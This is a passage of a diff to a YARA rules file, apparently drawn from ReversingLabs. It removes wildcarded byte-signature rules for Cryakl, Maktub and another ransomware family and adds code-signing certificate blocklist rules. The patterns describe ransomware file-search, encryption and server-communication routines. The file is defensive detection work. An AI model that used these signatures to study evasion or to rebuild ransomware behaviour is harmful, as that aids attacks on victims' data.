C0 - 68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? E8 - } - $file_search_3_1_1 = { - FF 15 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ?? - FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 - } - $file_search_3_1_2 = { - 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? - ?? 50 68 ?? ?? ?? ?? FF D6 6A ?? 8D 8D ?? ?? ?? ?? 51 FF D7 6A ?? 8D 95 ?? ?? ?? ?? - 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A - ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D - 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF D3 85 C0 74 ?? E8 - } - $file_search_3_2_1 = { - 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 50 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? - ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F0 FF 15 ?? ?? ?? ?? 56 8B F8 FF 15 ?? - ?? ?? ?? 83 FF ?? 0F 85 - } - $file_search_3_2_2 = { - 8B 35 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? - ?? FF D6 6A ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? - 51 8D 95 ?? ?? ?? ?? 52 6A ?? 6A ?? 6A ?? 6A ?? B8 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? - ?? FF D7 85 C0 74 ?? E8 - } - $search_and_encrypt_3_1 = { - 8B C3 83 C4 ?? 8D 50 ?? [1-3] 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 83 F8 ?? 76 - ?? 68 ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ?? - ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? - ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 - ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB - } - $search_and_encrypt_3_2 = { - 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 - 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 - 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? B8 ?? ?? - ?? ?? 90 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 - ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 - } - $search_and_encrypt_3_3 = { - 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? - 8D ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 53 - 8D ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D ?? ?? - ?? ?? ?? 68 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D ?? ?? ?? ?? ?? ?? 8D ?? ?? ?? - ?? ?? 68 ?? ?? ?? ?? ?? E8 - } - $search_and_encrypt_3_4 = { - E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 57 56 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? ?? ?? 8B CE E8 - ?? ?? ?? ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C6 E8 ?? - ?? ?? ?? 83 F8 ?? 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 E8 - } - condition: - uint16(0)==0x5A4D and (($file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_2_6a_1 and $encrypt_file_0_2_6a_2 and $server_communication_0_2_6a_1 and $server_communication_0_2_6a_2) or ($file_search_0_3_1_1 and $file_search_0_3_1_2 and $encrypt_file_0_3_1 and $server_communication_0_3_1_1 and $server_communication_0_3_1_2) or ($file_search_0_3_3_1 and $file_search_0_3_3_2 and $encrypt_file_0_3_3_1 and $encrypt_file_0_3_3_2 and $server_communication_0_3_3_1 and $server_communication_0_3_3_2) or ($file_search_0_3_4a_1 and $file_search_0_3_4a_2 and $encrypt_file_0_3_4a_1 and $encrypt_file_0_3_4a_2 and $server_communication_0_3_4a_1 and $server_communication_0_3_4a_2) or ($file_search_0_3_5a_1 and $file_search_0_3_5a_2 and $encrypt_file_0_3_5a_1 and $encrypt_file_0_3_5a_2 and $server_communication_0_3_5a_1 and $server_communication_0_3_5a_2) or ($server_communication_2_0_4e and $search_and_encrypt_2_0_4e_1 and $search_and_encrypt_2_0_4e_2 and $search_and_encrypt_2_0_4e_3 and $search_and_encrypt_2_0_4e_4 and $search_and_encrypt_2_0_4e_5) or ($server_communication_4_0_1 and $server_communication_4_0_2 and $server_communication_4_0_3 and $file_search_4_0_1 and $file_search_4_0_2 and $file_search_4_0_3) or ($file_search_4_1b_1 and $file_search_4_1b_2 and $file_search_4_1b_3 and $server_communication_4_1b_1 and $server_communication_4_1b_2 and $server_communication_4_1b_3 and $server_communication_4_1b_4 and $server_communication_4_1b_5) or ($file_search_4_2_1 and $file_search_4_2_2 and $server_communication_4_1b_1 and $server_communication_4_2_1 and $server_communication_4_2_2 and $server_communication_4_2_3 and $server_communication_4_2_4 and $server_communication_4_2_5) or ($server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_1_1 and $file_search_3_1_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4) or ($server_communication_4_0_1 and $server_communication_3_1 and $server_communication_3_2 and $file_search_3_1 and $file_search_3_2_1 and $file_search_3_2_2 and $search_and_encrypt_3_1 and $search_and_encrypt_3_2 and $search_and_encrypt_3_3 and $search_and_encrypt_3_4)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="54:00:d1:c1:40:65:28:b1:ef:62:59:76" and 1474266628<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Cryakl : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_013472D7D665557Bfa0Dc21B350A361B : INFO FILE { meta: - description = "Yara rule that detects Cryakl ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5c668278-458e-5b13-83c4-63beab5249ed" - date = "2020-07-15" - modified = "2020-07-15" + id = "9b63f06d-9808-5936-aad2-d387c74eccdd" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Cryakl.yara#L1-L64" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "51d50ab1ce021e2facbca3a35af372186287a8d69b66651c9804234a409d9932" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15022-L15038" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ab908ef0fca56753bcba8bc85e2fdf5859b4e226c179ec5c6eb6eb3dc4014a8e" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Cryakl" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $enum_and_encrypt_files_1 = { - 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? - ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? - ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? - ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 - ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF - 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 74 ?? 8D 45 ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? - E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 83 E0 ?? 83 F8 ?? 75 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 92 ?? ?? ?? ?? - 84 C0 0F 84 ?? ?? ?? ?? FF 75 ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 - } - $enum_and_encrypt_files_2 = { - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 95 ?? - ?? ?? ?? 33 C0 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? - C6 45 ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 10 FF 52 ?? 8B D8 - 4B 85 DB 0F 8C ?? ?? ?? ?? 43 33 F6 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 8D ?? - ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 8B D6 8B 38 FF 57 ?? 8B - 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 58 E8 ?? ?? ?? ?? 75 ?? C6 45 ?? ?? - 46 4B 0F 85 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ?? - ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 8B 0D ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 05 ?? ?? ?? ?? 8B 15 ?? ?? ?? - ?? 83 C0 ?? 83 D2 ?? 89 05 ?? ?? ?? ?? 89 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? - ?? ?? 8B 10 FF 92 ?? ?? ?? ?? 84 C0 75 ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? - ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 - } - condition: - uint16(0)==0x5A4D and (( all of ($enum_and_encrypt_files_*))) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yongli Zhang" and pe.signatures[i].serial=="01:34:72:d7:d6:65:55:7b:fa:0d:c2:1b:35:0a:36:1b" and 1470960000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Maktub : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_66C758A22Bfbbce327616815616Ddd07 : INFO FILE { meta: - description = "Yara rule that detects Maktub ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "23ca4232-77ff-5519-b6b0-ccec6cb35fe1" - date = "2020-07-15" - modified = "2020-07-15" + id = "4a7130ad-8b66-52a1-afd2-6d10776b4451" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Maktub.yara#L1-L116" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ee3213213e9521f7d19ce6340cd2f98057c22b1188ceefc30c17c18b6ec54e20" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L15040-L15056" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "37f0f64e2d84ef6591e1f07a05abca35b37827d26c828269fb5f38d8546a60a7" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Maktub" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files = { - 55 8B EC 83 EC ?? 53 8B 1D ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? E8 ?? ?? - ?? ?? 51 8D B3 ?? ?? ?? ?? 8B CB 56 E8 ?? ?? ?? ?? 85 C0 74 ?? 50 8B 43 ?? FF D0 8D - 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF - B3 ?? ?? ?? ?? FF D0 85 C0 74 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B 43 ?? 6A - ?? 6A ?? 6A ?? 6A ?? FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF D0 85 C0 75 ?? FF 75 ?? 8B 43 - ?? FF D0 5E 33 C0 5B 8B E5 5D C3 A1 ?? ?? ?? ?? 57 8B 7D ?? 85 C0 75 ?? FF 15 ?? ?? - ?? ?? A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F8 89 7D ?? 85 C9 74 - ?? 8B D1 33 C0 C1 E9 ?? F3 AB 8B CA 83 E1 ?? F3 AA 8B 7D ?? B9 ?? ?? ?? ?? 3B FE 76 - ?? 8D 46 ?? 3B F8 73 ?? 8D 57 ?? 8D 70 ?? 8B FF 8A 06 8D 52 ?? 88 42 ?? 8D 76 ?? 49 - 75 ?? EB ?? 8B D7 2B D6 8A 06 8D 76 ?? 88 44 32 ?? 49 75 ?? E8 ?? ?? ?? ?? 89 83 ?? - ?? ?? ?? 8D 4F ?? 8B 83 ?? ?? ?? ?? 89 47 ?? FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 - ?? 8D 45 ?? FF 75 ?? 50 8B 43 ?? 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0 85 C0 75 ?? A1 - ?? ?? ?? ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? - ?? ?? FF 75 ?? 8B 43 ?? FF D0 5F 5E 33 C0 5B 8B E5 5D C3 FF 75 ?? 8D 45 ?? 57 50 E8 - ?? ?? ?? ?? 50 8D 8B ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? - ?? 85 C0 75 ?? A1 ?? ?? ?? ?? FF D0 A3 ?? ?? ?? ?? 57 6A ?? 50 FF 15 ?? ?? ?? ?? FF - 75 ?? 8B 43 ?? FF D0 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 - } - $search_files = { - 55 8B EC 83 EC ?? 53 56 57 8B F9 68 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 0F 84 - ?? ?? ?? ?? 8B 47 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? - FF D0 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4F ?? 8D 45 ?? 50 0F 57 C0 53 66 0F 13 45 - ?? FF D1 85 C0 0F 84 ?? ?? ?? ?? 8B 75 ?? 8B C6 0B 45 ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 6A ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF - 72 ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 87 ?? ?? ?? ?? - 8B 55 ?? 8D 4A ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? FF 70 ?? 50 FF 31 8D 4D ?? E8 ?? ?? - ?? ?? 8B 45 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? - FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 75 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 45 ?? 85 C0 - 7C ?? 7F ?? 81 FE ?? ?? ?? ?? 72 ?? 50 8B 45 ?? 56 53 8B 1D ?? ?? ?? ?? 33 F6 51 8D - 48 ?? 89 65 ?? 39 31 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 51 33 F6 89 65 ?? 89 - 01 8B 45 ?? 39 70 ?? 8D 48 ?? 7C ?? 51 8D 70 ?? FF D3 8B 4D ?? 8D 46 ?? 89 01 8B CF - E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 E9 ?? ?? ?? ?? 8B 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A - ?? 6A ?? 68 ?? ?? ?? ?? 56 FF D0 89 45 ?? 83 F8 ?? 75 ?? 8B 47 ?? 53 FF D0 33 FF E9 - ?? ?? ?? ?? 51 8D 87 ?? ?? ?? ?? 8B CF 50 E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? - ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 4D ?? C7 45 - ?? ?? ?? ?? ?? 51 FF 75 ?? 50 8B 47 ?? 53 FF D0 85 C0 75 ?? 8B 4D ?? E9 ?? ?? ?? ?? - 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? - ?? ?? ?? ?? 50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 85 C0 74 ?? E8 ?? ?? ?? ?? - 8B 45 ?? 6A ?? 89 45 ?? 8D 45 ?? 50 8B 47 ?? 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF D0 - 85 C0 75 ?? 8B 4D ?? EB ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 8B 47 ?? 6A ?? 6A ?? 6A ?? - FF 75 ?? FF D0 85 C0 75 ?? 8B 4D ?? EB ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF - 75 ?? 8B 45 ?? 50 FF 75 ?? 8B 47 ?? FF D0 8B 4D ?? 85 C0 74 ?? 8B 45 ?? 3B 45 ?? 74 - ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 FF 75 ?? 8B 47 ?? FF D0 - 8B 47 ?? 56 FF D0 33 FF E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 FF 75 - ?? 8B 47 ?? FF D0 8B 47 ?? 53 FF D0 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? - ?? ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? - ?? ?? ?? 6A ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 51 8D 45 ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 45 - ?? 8B CC 50 E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? FF 75 ?? 8B 47 ?? FF D0 85 C0 75 ?? - 8B 47 ?? 56 FF D0 33 FF EB ?? BF ?? ?? ?? ?? 83 C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? - 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 8B 1D ?? ?? - ?? ?? 56 6A ?? 50 FF D3 EB ?? 8B 47 ?? 53 FF D0 33 FF 8B 1D ?? ?? ?? ?? 8B 75 ?? 83 - C6 ?? 8D 46 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 7F ?? A1 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? - ?? ?? ?? A3 ?? ?? ?? ?? 56 6A ?? 50 FF D3 8B C7 5F 5E 5B 8B E5 5D C2 - } - $previous_encrypt_files = { - 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8D 4D - ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF - 77 ?? FF D3 8D 4D ?? 89 87 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 - 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 - 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D - 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? - FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? - ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF - 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? - ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 - B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? - ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 - 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF 77 ?? FF D3 8B F0 - 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D - 4D ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 - ?? ?? ?? ?? FF D3 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? - ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 ?? ?? ?? ?? FF D3 8B F0 8D - 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? FF 30 FF 15 ?? ?? ?? ?? 8B F0 8D 4D ?? 89 B7 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 85 F6 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 30 FF B7 